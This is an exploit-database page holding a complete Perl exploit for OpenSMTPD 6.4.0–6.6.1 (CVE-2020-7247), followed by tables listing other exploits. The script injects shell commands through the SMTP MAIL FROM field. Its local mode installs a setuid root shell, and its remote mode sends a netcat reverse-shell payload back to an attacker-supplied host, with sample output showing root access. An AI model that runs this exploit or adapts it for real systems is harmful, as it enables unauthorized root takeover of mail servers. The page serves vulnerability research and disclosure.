Menu

Search for hundreds of thousands of exploits

"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"

Author

Exploit author

"Marco Ivaldi"

Platform

Exploit platform

freebsd

Release date

Exploit published date

2020-02-11

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
# Exploit Title: OpenSMTPD 6.6.1 - Local Privilege Escalation
# Date: 2020-02-02
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.opensmtpd.org/
# Version: OpenSMTPD 6.4.0 - 6.6.1
# Tested on: OpenBSD 6.6, Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1
# CVE: CVE-2020-7247

#!/usr/bin/perl

#
# raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD
# Copyright (c) 2020 Marco Ivaldi <[email protected]>
#
# smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and
# other products, allows remote attackers to execute arbitrary commands as root
# via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL
# FROM field. This affects the "uncommented" default configuration. The issue
# exists because of an incorrect return value upon failure of input validation
# (CVE-2020-7247).
#
# "Wow. I feel all butterflies in my tummy that bugs like this still exist. 
# That's awesome :)" -- skyper
#
# This exploit targets OpenBSD's OpenSMTPD in order to escalate privileges to
# root on OpenBSD in the default configuration, or execute remote commands as 
# root (only in OpenSMTPD "uncommented" default configuration).
#
# See also:
# https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt
# https://poolp.org/posts/2020-01-30/opensmtpd-advisory-dissected/
# https://www.kb.cert.org/vuls/id/390745/
# https://www.opensmtpd.org/security.html
#
# Usage (LPE):
# phish$ uname -a
# OpenBSD phish.fnord.st 6.6 GENERIC#353 amd64
# phish$ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor), 0(wheel)
# phish$ ./raptor_opensmtpd.pl LPE
# [...]
# Payload sent, please wait 5 seconds...
# -rwsrwxrwx  1 root  wheel  12432 Feb  1 21:20 /usr/local/bin/pwned
# phish# id
# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)
#
# Usage (RCE):
# [email protected] ~ % ./raptor_opensmtpd.pl RCE 10.0.0.162 10.0.0.24 example.org
# [...]
# Payload sent, please wait 5 seconds...
# /bin/sh: No controlling tty (open /dev/tty: Device not configured)
# /bin/sh: Can't find tty file descriptor
# /bin/sh: warning: won't have full job control
# phish# id
# uid=0(root) gid=0(wheel) groups=0(wheel)
#
# Vulnerable platforms (OpenSMTPD 6.4.0 - 6.6.1):
# OpenBSD 6.6 [tested]
# OpenBSD 6.5 [untested]
# OpenBSD 6.4 [untested]
# Debian GNU/Linux bullseye/sid with opensmtpd 6.6.1p1-1 [tested]
# Other Linux distributions [untested]
# FreeBSD [untested]
# NetBSD [untested]
# 

use IO::Socket::INET;

print "raptor_opensmtpd.pl - LPE and RCE in OpenBSD's OpenSMTPD\n";
print "Copyright (c) 2020 Marco Ivaldi <raptor\@0xdeadbeef.info>\n\n";

$usage = "Usage:\n".
"$0 LPE\n".
"$0 RCE <remote_host> <local_host> [<domain>]\n";
$lport = 4444;

($type, $rhost, $lhost, $domain) = @ARGV;
die $usage if (($type ne "LPE") && ($type ne "RCE"));

# Prepare the payload
if ($type eq "LPE") { # LPE
	$payload = "cp /bin/sh /usr/local/bin/pwned\n".
	"echo 'main(){setuid(0);setgid(0);system(\"/bin/sh\");}' > /tmp/pwned.c\n".
	"gcc /tmp/pwned.c -o /usr/local/bin/pwned\nchmod 4777 /usr/local/bin/pwned";
	$rhost = "127.0.0.1";
} else { # RCE
	die $usage if ((not defined $rhost) || (not defined $lhost));
	$payload = "sleep 5;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|".
	"nc $lhost $lport >/tmp/f";
}

# Open SMTP connection
$| = 1;
$s = IO::Socket::INET->new("$rhost:25") or die "Error: [email protected]\n";

# Read SMTP banner
$r = <$s>;
print "< $r";
die "Error: this is not OpenSMTPD\n" if ($r !~ /OpenSMTPD/);

# Send HELO
$w = "HELO fnord";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Send evil MAIL FROM
$w = "MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Send RCPT TO
if (not defined $domain) {
	$rcpt = "<root>";
} else {
	$rcpt = "<root\@$domain>";
}
$w = "RCPT TO:$rcpt";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Send payload in DATA
$w = "DATA";
print "> $w\n";
print $s "$w\n";
$r = <$s>;
print "< $r";
$w = "\n#0\n#1\n#2\n#3\n#4\n#5\n#6\n#7\n#8\n#9\n#a\n#b\n#c\n#d\n$payload\n.";
#print "> $w\n"; # uncomment for debugging
print $s "$w\n";
$r = <$s>;
print "< $r";
die "Error: expected 250\n" if ($r !~ /^250/);

# Close SMTP connection
$s->close();
print "\nPayload sent, please wait 5 seconds...\n";

# Got root?
if ($type eq "LPE") { # LPE
	sleep 5;
	print `ls -l /usr/local/bin/pwned`;
	exec "/usr/local/bin/pwned" or die "Error: exploit failed :(\n";
} else { # RCE
	exec "nc -vl $lport" or die "Error: unable to execute netcat\n"; # BSD netcat
	#exec "nc -vlp $lport" or die "Error: unable to execute netcat\n"; # Debian netcat
}
Release DateTitleTypePlatformAuthor
2020-02-14"EPSON EasyMP Network Projection 2.81 - 'EMP_NSWLSV' Unquoted Service Path"localwindows"Roberto Piña"
2020-02-14"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"localwindowsboku
2020-02-14"SprintWork 2.3.1 - Local Privilege Escalation"localwindowsboku
2020-02-14"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection"webappsphpJ3rryBl4nks
2020-02-13"Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin tutor.1.5.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin wordfence.7.4.5 - Local File Disclosure"webappsphp"Mehran Feizi"
2020-02-13"Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload"webappsphp"Mehran Feizi"
2020-02-13"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion"webappsphp"Mehran Feizi"
2020-02-13"OpenTFTP 1.66 - Local Privilege Escalation"localwindowsboku
2020-02-13"PANDORAFMS 7.0 - Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
2020-02-12"HP System Event Utility - Local Privilege Escalation"localwindowshyp3rlinx
2020-02-12"MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow"localwindowsZwX
2020-02-12"MyVideoConverter Pro 3.14 - 'TVSeries' Buffer Overflow"localwindowsZwX
2020-02-12"MyVideoConverter Pro 3.14 - 'Output Folder' Buffer Overflow"localwindowsZwX
2020-02-11"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting"webappscgiLuca.Chiou
2020-02-11"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting"webappsphp"Sayak Naskar"
2020-02-11"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)"webappsphpMetasploit
2020-02-11"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path"localwindowsboku
2020-02-11"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"remotefreebsd"Marco Ivaldi"
2020-02-11"Disk Savvy Enterprise 12.3.18 - Unquoted Service Path"localwindowsboku
2020-02-11"Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"Wedding Slideshow Studio 1.36 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-11"Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path"localwindowsboku
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Name' Buffer Overflow"localwindowsZwX
2020-02-11"DVD Photo Slideshow Professional 8.07 - 'Key' Buffer Overflow"localwindowsZwX
2020-02-11"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path"localwindowsboku
2020-02-11"Torrent iPod Video Converter 1.51 - Stack Overflow"localwindowsboku
2020-02-10"LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-02-10"Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow"localwindowsZwX
Release DateTitleTypePlatformAuthor
2020-02-11"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"remotefreebsd"Marco Ivaldi"
2019-12-30"FreeBSD-SA-19:15.mqueuefs - Privilege Escalation"localfreebsd"Karsten König"
2019-12-30"FreeBSD-SA-19:02.fd - Privilege Escalation"localfreebsd"Karsten König"
2016-01-25"FreeBSD SCTP ICMPv6 - Error Processing"dosfreebsdptsecurity
2015-01-29"FreeBSD - Multiple Vulnerabilities"dosfreebsd"Core Security"
2013-10-04"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation"localfreebsdCurcolHekerLink
2013-06-26"FreeBSD 9 - Address Space Manipulation Privilege Escalation (Metasploit)"localfreebsdMetasploit
2013-06-21"FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation"localfreebsdHunger
2013-02-05"FreeBSD 9.1 - 'ftpd' Remote Denial of Service"dosfreebsd"Maksymilian Arciemowicz"
2013-01-29"pfSense UTM Platform 2.0.1 - Cross-Site Scripting"webappsfreebsd"Dimitris Strevinas"
2012-12-07"m0n0wall 1.33 - Multiple Cross-Site Request Forgery Vulnerabilities"webappsfreebsd"Yann CAM"
2012-08-03"FreeBSD - SCTP Remote NULL Ptr Dereference Denial of Service"dosfreebsd"Shaun Colley"
2011-12-01"FreeBSD - 'ftpd / ProFTPd' Remote Command Execution"remotefreebsdkingcope
2011-09-30"FreeBSD - UIPC socket heap Overflow (PoC)"dosfreebsd"Shaun Colley"
2011-06-30"FreeBSD OpenSSH 3.5p1 - Remote Command Execution"remotefreebsdkingcope
2011-02-06"FreeBSD 5.4-RELEASE ftpd 6.00LS - 'sendfile' Memory Leak"localfreebsdkingcope
2010-12-10"Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow"remotefreebsdkingcope
2010-08-19"FreeBSD - 'mbufs()' sendfile Cache Poisoning Privilege Escalation"localfreebsdkingcope
2010-07-03"Zabbix Agent - 'net.tcp.listen' Command Injection (Metasploit)"remotefreebsdMetasploit
2010-06-23"FreeBSD 8.0/7.3/7.2 - 'nfs_mount()' Local Privilege Escalation"localfreebsd"Patroklos Argyroudis"
2010-06-23"FreeBSD - 'mountnfs()' Denial of Service"dosfreebsd"Patroklos Argyroudis"
2010-05-27"FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)"dosfreebsd"Maksymilian Arciemowicz"
2010-05-19"McAfee Email Gateway - Web Administration Broken Access Control"webappsfreebsd"Nahuel Grisolia"
2010-04-06"McAfee Email Gateway (formerly IronMail) - Local Privilege Escalation"localfreebsd"Nahuel Grisolia"
2010-04-06"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure"localfreebsd"Nahuel Grisolia"
2009-10-08"FreeBSD 6.4 - 'pipeclose()'/'knlist_cleardel()' Race Condition"localfreebsd"Przemyslaw Frasunek"
2009-10-08"FreeBSD 7.2 - VFS/devfs Race Condition"localfreebsd"Przemyslaw Frasunek"
2009-08-24"FreeBSD 6.1 - 'kqueue()' Null Pointer Dereference Privilege Escalation"localfreebsd"Przemyslaw Frasunek"
2009-08-06"FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service"dosfreebsd"Shaun Colley"
2009-07-27"NcFTPd 2.8.5 - Remote Jail Breakout"remotefreebsdkingcope
Release DateTitleTypePlatformAuthor
2020-02-11"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution"remotefreebsd"Marco Ivaldi"
2020-01-16"SunOS 5.10 Generic_147148-26 - Local Privilege Escalation"localmultiple"Marco Ivaldi"
2019-10-21"Solaris 11.4 - xscreensaver Privilege Escalation"localsolaris"Marco Ivaldi"
2019-10-16"Solaris xscreensaver 11.4 - Privilege Escalation"localsolaris"Marco Ivaldi"
2019-06-17"Exim 4.87 - 4.91 - Local Privilege Escalation"locallinux"Marco Ivaldi"
2019-05-20"Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation"localsolaris"Marco Ivaldi"
2019-05-20"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)"localsolaris"Marco Ivaldi"
2019-05-20"Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)"localsolaris"Marco Ivaldi"
2019-01-14"xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)"localsolaris"Marco Ivaldi"
2018-11-30"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation"localopenbsd"Marco Ivaldi"
2018-10-30"xorg-x11-server 1.20.3 - Privilege Escalation"localopenbsd"Marco Ivaldi"
2009-09-11"IBM AIX 5.6/6.1 - '_LIB_INIT_DBG' Arbitrary File Overwrite via Libc Debug"localaix"Marco Ivaldi"
2008-03-10"Solaris 8/9/10 - 'fifofs I_PEEK' Local Kernel Memory Leak"localsolaris"Marco Ivaldi"
2007-04-04"TrueCrypt 4.3 - 'setuid' Local Privilege Escalation"localwindows"Marco Ivaldi"
2007-02-13"Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack"remotemultiple"Marco Ivaldi"
2007-02-13"Lotus Domino R6 Webmail - Remote Password Hash Dumper"remotewindows"Marco Ivaldi"
2007-02-06"MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution"remotewindows"Marco Ivaldi"
2006-12-19"Oracle 9i/10g - 'utl_file' FileSystem Access"remotelinux"Marco Ivaldi"
2006-12-19"Oracle 9i/10g - 'extproc' Local/Remote Command Execution"remotemultiple"Marco Ivaldi"
2006-11-23"Oracle 9i/10g - 'read/write/execute' ation Suite"remotemultiple"Marco Ivaldi"
2006-10-24"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (2)"localsolaris"Marco Ivaldi"
2006-10-24"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)"localsolaris"Marco Ivaldi"
2006-10-16"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)"localsolaris"Marco Ivaldi"
2006-10-13"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation (1)"localsolaris"Marco Ivaldi"
2006-10-13"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)"localsolaris"Marco Ivaldi"
2006-09-13"X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (2)"localsolaris"Marco Ivaldi"
2006-08-22"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure (2)"localsolaris"Marco Ivaldi"
2006-08-22"Solaris 8/9 - '/usr/ucb/ps' Local Information Leak"localsolaris"Marco Ivaldi"
2006-07-18"Linux Kernel 2.6.13 < 2.6.17.4 - 'logrotate prctl()' Local Privilege Escalation"locallinux"Marco Ivaldi"
2006-07-13"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (3)"locallinux"Marco Ivaldi"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48051/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse